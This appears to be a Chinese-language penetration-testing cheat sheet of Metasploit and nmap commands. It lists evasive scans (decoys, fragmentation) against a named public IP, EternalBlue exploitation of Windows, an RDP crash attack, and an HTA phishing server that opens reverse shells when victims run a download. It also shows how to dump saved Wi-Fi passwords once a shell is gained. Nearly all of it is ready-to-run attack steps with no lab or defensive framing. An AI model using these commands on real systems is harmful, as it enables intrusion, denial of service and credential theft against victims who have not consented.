信息搜集
nmap --sP -iL abin.txt (从abin.txt导入ip地址列表进行扫描,-sP主机存货判断)
nmap -A 120.55.226.24 (启用操作系统检测,版本检测,脚本扫描和跟踪路由)
nmap -sS 120.55.226.24 (半连接扫描)
nmap -sT 120.55.226.24 (全连接扫描)
nmap -sU 120.55.226.24 (udp扫描)
nmap -D 1.1.1.1 192.168.1.102 (伪装地址为1.1.1.1)
nmap --mtu 8 192.168.1.102 (指定每个扫描包的大小)
nmap ip -v 10.1.2.1/24 (扫描代表的是10.1.2.1 ~ 10.1.2.255 进行扫描)
还有很多的工具,最常用的就是nmap,还有一个是xerosploit
xerosploit安装:
$ git clone https://github.com/LionSec/xerosploit.git
接下来,用sudo命令运行安装脚本install.py:
$ sudo python install.py
漏洞利用工具msf
msf打开方式
直接在终端输入msfconsole
进入msf的目录/usr/share/metasploit-framework,运行命令./msfconsole
更新
kali 运行命令apt update,apt install metasploit-framework
------------------------------------------------------------------------------------------
1 How to exploit Windows Vista only by victim's using Kali Linux (永恒之蓝漏洞)
(smb_ms17_010)
# msfconsole
#msf> use auxiliary/scanner/smb/smb_ms17_010 (利用该模块查看对方主机是否存在该漏洞)
#msf> set RHOSTS (remote ip) (设置对方ip)
#msf> run (开始扫描)
#msf> use exploit/windows/smb/ms17_010_psexec (若扫描成功存在该漏洞,就开始利用这个利用模块)
#msf> set RHOSTS (remote ip) (设置对方ip)
#msf> exploit (开始渗透)
------------------------------------------------------------------------------------------
2. How to crash windows xp(blue screen) with metasploit using kali linux (如何让winxp蓝屏)
# msfconsole
#msf> use auxiliary/dos/windows/rdp/ms12_020_maxchannelids (漏洞利用)
#msf> set rhost (remote ip)
#msf> exploit
------------------------------------------------------------------------------------------
3. How to exploit windows with HTA server using kali linux (搞一个钓鱼网战,当用户点击下载的打开就中招)
#msfconsole
#msf> use windows/misc/hta_server/ (利用该模块)
#msf> set srvhost (local ip) (设置服务器ip,通常是自己的ip)
#msf> set uripath / (设置服务器路径)
#msf> exploit (开始监听渗透)
打开网页下载打开后.
#msf> sessions (若别人下载打开之后,会出现payload反弹,使用该名令来查看靶机)
#msf> sessions -i num (切换到渗透的靶机)
------------------------------------------------------------------------------------------
5 How to get Windows Wi-Fi saved passwords using Metasploit and Kali Linux (如何获取对方的wifi密码)
前提: 获取windows shell
#msf> shell
cmd> netsh wlan show profile (查看已缓存的wifi)
cmd> netsh wlan show profile [wifi_name] key=clear (查看选定的wifi名密码)